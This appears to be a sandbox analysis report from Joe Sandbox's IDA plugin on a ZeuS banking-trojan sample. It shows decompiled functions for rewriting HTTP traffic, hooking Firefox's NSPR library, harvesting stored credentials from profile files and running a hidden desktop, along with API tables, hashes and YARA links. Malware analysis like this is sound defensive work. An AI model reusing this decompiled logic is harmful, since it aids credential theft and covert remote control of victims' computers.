						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E00405299(E004051E6( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x4233d4);
					_t107 =  *0x4233f8(_t179, _a8, _a12);
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x4233d4);
					_t108 = E0040F394(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x4233d0();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x4233f0;
						_v36 = _t176;
						if(_t168 > 0) {
							E00405222( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040FC1A(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E0040FDC4( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00412174( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E004051B6( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E00405222(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
										_push(_t155);
										if((_v32 & 0x00000002) == 0) {
											E0040598F( &_v32);
											_t188 = E0040A190(_t186, _v16, "Content-Length",  &_v36) + _v60;
											E00405222(_t188, _v68, _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00405F1D(_t131, _t177, _t191);
											E00405222(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E00405222(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E00405222(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
										}
										E004051E6( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E004051E6(_v48);
							}
							_t153 = 0x4233d4;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E00412692( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x4233f0;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4338652
					if(E00405171( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x00410002
0x00410007
0x0041000c
0x004102f9
0x00410300
0x00000000
0x00410026
0x0041002c
0x00410032
0x00410034
0x0041003c
0x004102f2
0x004102f3
0x00000000
0x004102f3
0x00410045
0x0041004f
0x0041028b
0x0041028e
0x00410291
0x00410291
0x00410294
0x00410299
0x004102a5
0x004102aa
0x004102b0
0x004102b3
0x004102c1
0x004102c1
0x004102c7
0x004102cd
0x00410309
0x0041030f
0x0041030f
0x00410059
0x00000000
0x00000000
0x00410060
0x0041006d
0x00410076
0x0041007d
0x004102ec
0x004102ec
0x00000000
0x004102ec
0x00410084
0x00410086
0x0041008b
0x00410090
0x004102d1
0x004102d1
0x004102d3
0x004102d8
0x004102d8
0x004102de
0x004102e5
0x004102e6
0x00000000
0x004102e6
0x00410096
0x0041009c
0x004100c0
0x004100c3
0x004100c9
0x004100cf
0x004100dc
0x004100e1
0x004100e1
0x004100ee
0x004100f3
0x004100fa
0x0041011e
0x00410123
0x0041012a
0x0041014a
0x00410157
0x00410168
0x0041016a
0x00410170
0x0041017f
0x00410189
0x0041018a
0x004101c6
0x004101e6
0x004101eb
0x004101f0
0x004101f0
0x0041018c
0x0041018c
0x00410193
0x00410195
0x004101a2
0x004101a5
0x004101b1
0x004101b4
0x004101b9
0x004101bd
0x004101bd
0x004101f2
0x004101f9
0x0041020e
0x0041020e
0x00410213
0x00410218
0x0041021e
0x00410221
0x00410221
0x00410170
0x00410228
0x0041022d
0x0041022d
0x00410232
0x00410232
0x0041023d
0x00410254
0x00410254
0x00410261
0x00410267
0x0041026d
0x00410273
0x00410276
0x00410279
0x0041027c
0x00410281
0x00410285
0x00410288
0x00000000
0x00410288
0x00410256
0x0041025b
0x00000000
0x00000000
0x00000000
0x0041023f
0x00410243
0x00410250
0x00000000
0x00410250
0x00410245
0x00410246
0x00000000
0x00410246
0x0041023d
0x004100a1
0x004100aa
0x004100ac
0x004100b6
0x00000000
0x00000000
0x004100bc
0x00000000
0x004100bc

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

EnterCriticalSection.KERNEL32(004233D4), ref: 00410032
LeaveCriticalSection.KERNEL32(004233D4), ref: 00410060
EnterCriticalSection.KERNEL32(004233D4), ref: 00410084
LeaveCriticalSection.KERNEL32(004233D4,00000000,?,00000000), ref: 004102C7
LeaveCriticalSection.KERNEL32(004233D4), ref: 004102E6

Part of subcall function 0040A190: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040A1EA

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

LeaveCriticalSection.KERNEL32(004233D4), ref: 004102F3

Strings

Content-Length, xrefs: 004101D0
%x, xrefs: 0041018C
0, xrefs: 004101AC

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 76b2d39803747284f8b163e729dfe8b5ea9688545f962bab8c0144a1bfd70fd9
Instruction ID: 93d363655daae37b504d58c5fa885ba3b644f58f0cb4df55ecefe330d9afab3c
Opcode Fuzzy Hash: 76b2d39803747284f8b163e729dfe8b5ea9688545f962bab8c0144a1bfd70fd9
Instruction Fuzzy Hash: CD91BD72504612AFCB10DF24D84599ABBB4FF84314F000A6EF850A72A1D778EA95CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041415B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041415B(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E0040F34A(_t46,  &_v252);
				_t48 = 0x6b;
				E0040F34A(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0040930A(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E00413F6F(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E0040F34A(_t57,  &_v64);
					_t59 = 0x6e;
					E0040F34A(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E0040F34A(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E00413F2D(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0040A91B( &_v772,  &_v24, 0, 3, 2, E00414112,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E004051E6(_v12);
						}
						_push(0xcb);
						return E0041293E(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E0040F34A(_t68,  &_v180);
					_t70 = 0x6c;
					E0040F34A(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0040930A(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E00413F2D(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x0041415b
0x0041415b
0x0041416f
0x0041417c
0x0041417d
0x00414187
0x00414188
0x0041419d
0x004141a8
0x004141b0
0x004141b2
0x004141b4
0x004141c1
0x004141d2
0x004141de
0x004141de
0x004141b4
0x004141e4
0x004141e9
0x00414309
0x00414309
0x00000000
0x004141ef
0x004141f4
0x004141f5
0x00414202
0x00414203
0x0041420a
0x0041420d
0x0041420e
0x00414216
0x0041421f
0x00414224
0x0041422b
0x00414232
0x00414239
0x00414240
0x00414243
0x00414243
0x00414254
0x0041425c
0x0041425e
0x00414261
0x0041426f
0x00414276
0x00414276
0x0041428f
0x00414292
0x00414298
0x00414298
0x0041429d
0x0041429e
0x004142a7
0x0041430d
0x0041430d
0x00000000
0x00414324
0x00414312
0x00000000
0x0041431a
0x004142b1
0x004142b2
0x004142bc
0x004142bd
0x004142cd
0x004142d8
0x004142e0
0x004142e2
0x004142e4
0x004142f1
0x00414304
0x00414304
0x004142e4
0x00000000
0x004142e0

APIs

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004141C1

Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 00413FA6
Part of subcall function 00413F6F: StrStrIW.SHLWAPI(?,?), ref: 0041402E
Part of subcall function 00413F6F: StrStrIW.SHLWAPI(?,?), ref: 0041403F
Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 0041405B
Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 00414079

PathRemoveFileSpecW.SHLWAPI(?), ref: 004141DE

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00414254
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 004142F1

Strings

$, xrefs: 00414224
#, xrefs: 00414239
&, xrefs: 00414232

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: df6cb5c6da72b1241ae51dc1d824498f3738ef8515b478fd251b57d9802989d7
Instruction ID: fb74a93b5cbbf33ea3f2ca381c5579b68f429936b0253ecff0b666a04714469c
Opcode Fuzzy Hash: df6cb5c6da72b1241ae51dc1d824498f3738ef8515b478fd251b57d9802989d7
Instruction Fuzzy Hash: 4F515E76E40218AADF20DBA1DC49FDF77BCAB48314F0005A7BA05F7181D778AB858B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040F807, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F807(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x4233f0 =  *0x4233f0 & 0x00000000;
				 *0x4233f4 =  *0x4233f4 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x4233d4);
				 *0x4233ec = _a4;
				 *0x4233c8 = _a8;
				 *0x4233f8 = _a12;
				 *0x4233cc = _t14;
				 *0x4233c4 = _a16;
				 *0x423234 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x4233d0 = GetProcAddress( *0x4233cc, "PR_SetError");
				_t12 = GetProcAddress( *0x4233cc, "PR_GetError");
				 *0x4231cc = _t12;
				return _t12;
			}

0x0040f807
0x0040f80e
0x0040f81b
0x0040f81d
0x0040f827
0x0040f830
0x0040f83e
0x0040f847
0x0040f854
0x0040f866
0x0040f878
0x0040f87d
0x0040f87f
0x0040f885

APIs

InitializeCriticalSection.KERNEL32(004233D4,74B04EE0,0040E317,00422348), ref: 0040F81D
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F859
GetProcAddress.KERNEL32(PR_SetError), ref: 0040F86B
GetProcAddress.KERNEL32(PR_GetError), ref: 0040F87D

Strings

PR_GetNameForIdentity, xrefs: 0040F839
PR_GetError, xrefs: 0040F86D
PR_SetError, xrefs: 0040F85B

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 19bfad70c24a588a5416628e1a211597a686679750d791b598d676707ff293f6
Instruction ID: c9e13c538d10998c415214bd94c901d369d560a9c15a2a6aa7c215be741372ea
Opcode Fuzzy Hash: 19bfad70c24a588a5416628e1a211597a686679750d791b598d676707ff293f6
Instruction Fuzzy Hash: 8F018475B053559BC720DF65EC45A057BF0FB48B62B90483AE814932A0DBB89612CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0041967B, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041967B(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00405865( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E0040826F(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E004085E1(_t109, _t63);
					E0040859F(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0040B88A(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E0041C946(0x2937498d,  &_v1028, 0);
						_t63 = E0040B9A6(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0040D35A(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E0040D5C5( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E0040F34A(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E0040AA77( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E00405299( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E00406AAD( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x40d7cf;
								_v1124 = 0x40d7d2;
								_v1120 = E0040D7D5;
								_v1116 = E0040D7F9;
								_v1112 = E0040D840;
								_v1108 = E0040D875;
								_v1104 = 0x40d7cf;
								E0041B567(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E0041131B(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E004083E2(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E0040822E( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E00408589(E00408589(_t63, _v1156), _v1152);
						E004051E6(_t105);
						return 0;
					} else {
						E004085E1(_t108, _t63);
						goto L4;
					}
				}
			}

0x0041967b
0x00419688
0x0041968b
0x0041968e
0x0041968f
0x00419693
0x00419697
0x0041969d
0x004196e3
0x004196ea
0x004196ef
0x004196f4
0x004196f9
0x004196fd
0x004196ff
0x00000000
0x00000000
0x00419706
0x0041970f
0x00419717
0x00419718
0x0041971a
0x00419720
0x00419728
0x00000000
0x00000000
0x0041972e
0x00419734
0x00419767
0x0041977d
0x0041978a
0x0041978f
0x00419791
0x00000000
0x00000000
0x004197a0
0x004197a5
0x004197a7
0x004198d3
0x004198dc
0x00000000
0x004197ad
0x004197ad
0x004197b3
0x004197b5
0x004197ba
0x004197bf
0x004197ce
0x004197d3
0x004197e0
0x004197e6
0x004197e8
0x004197f5
0x004197fa
0x004197fc
0x00419800
0x00419808
0x00419814
0x0041982c
0x00419830
0x00419835
0x00419837
0x00419842
0x00419852
0x00419858
0x0041985a
0x0041985a
0x00419837
0x004197fc
0x004197e8
0x00419867
0x0041986d
0x00419872
0x00419889
0x00419896
0x0041989e
0x004198a6
0x004198ae
0x004198b6
0x004198be
0x004198c6
0x004198ce
0x004198ce
0x00000000
0x00419872
0x00419736
0x00419739
0x00419754
0x0041973b
0x0041973b
0x00419743
0x00419748
0x00419748
0x00000000
0x00419739
0x004196a4
0x004196aa
0x004196ab
0x004196b4
0x004196bf
0x004196c4
0x004196cc
0x004196d1
0x004196d7
0x004198e1
0x004198ee
0x004198f4
0x00419901
0x004196dd
0x004196de
0x00000000
0x004196de
0x004196d7

APIs

Part of subcall function 0040822E: socket.WS2_32(?,00000001,00000006), ref: 00408237
Part of subcall function 0040822E: connect.WS2_32(00000000,?,-0000001D), ref: 00408257
Part of subcall function 0040822E: closesocket.WS2_32(00000000), ref: 00408262

Part of subcall function 004085E1: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004085F7

GetCurrentThread.KERNEL32 ref: 00419760
SetThreadPriority.KERNEL32(00000000), ref: 00419767

Part of subcall function 0040B9A6: OpenWindowStationW.USER32 ref: 0040B9CB
Part of subcall function 0040B9A6: CreateWindowStationW.USER32 ref: 0040B9DE
Part of subcall function 0040B9A6: GetProcessWindowStation.USER32 ref: 0040B9EF
Part of subcall function 0040B9A6: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040BA2A
Part of subcall function 0040B9A6: CreateDesktopW.USER32 ref: 0040BA3E
Part of subcall function 0040B9A6: GetCurrentThreadId.KERNEL32 ref: 0040BA4A
Part of subcall function 0040B9A6: GetThreadDesktop.USER32(00000000), ref: 0040BA51
Part of subcall function 0040B9A6: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040BA63
Part of subcall function 0040B9A6: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040BA75
Part of subcall function 0040B9A6: CloseWindowStation.USER32(?,?), ref: 0040BA90

Part of subcall function 0040D35A: TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373

GetShellWindow.USER32 ref: 004197AD
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 004197E0

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00419842
CloseHandle.KERNEL32(?), ref: 00419852
CloseHandle.KERNEL32(?), ref: 00419858
SystemParametersInfoW.USER32 ref: 00419867

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
String ID:
API String ID: 1240616959-0
Opcode ID: b2780c045a755fe3b80d6ec365fe3fee6ba3936687b969d175e0075cc8536d3c
Instruction ID: f83c0a9bf5d7524663b60e026974cb35d1458058d7e13ec234b926d5c24605e1
Opcode Fuzzy Hash: b2780c045a755fe3b80d6ec365fe3fee6ba3936687b969d175e0075cc8536d3c
Instruction Fuzzy Hash: 45619071508341AFD720EF61CD44A9FBBE8AF85704F04492EF994A72A1D778D848CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDA7, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CDA7(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t56;
				void* _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				void* _t72;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0041C97E(__ecx, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					if(E0041CAA4() == 0) {
						L26:
						E004089B9(_v148);
						_t49 = 0;
						L27:
						return _t49;
					}
					E0041D56B(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0040CC52( &_v160, _v78,  &_v168) & 0x0000ffff;
					if(_t94 != 0) {
						L7:
						if(_t94 != _v74) {
							E0041D626( &_v124);
							_v78 = _t94;
							E0041D67E( &_v128);
						}
						_v144 =  *0x423e74;
						_t56 = _v152;
						_v172 = 1;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						if(_t57 != 0) {
							_t87 = _v172;
							_v172 = _v172 + 1;
							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						if(_t59 <= 0) {
							L25:
							E00408589(_t59, _v156);
							E00408589(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(_t59 < _v172) {
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								if(_t64 != _v152) {
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E004085E1(_t87, _t97);
											if(E00406C1B(0x20000, E0040CCDA, _t97) == 0) {
												E00408589(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					}
					while(WaitForSingleObject( *0x423e74, 0x3e8) == 0x102) {
						_t87 = _v74;
						_t94 = E0040CC52( &_v156, _v74,  &_v164) & 0x0000ffff;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x0040cdad
0x0040cdb8
0x0040cdbf
0x0040cdc6
0x0040cdcc
0x0040cddd
0x0040cf75
0x0040cf79
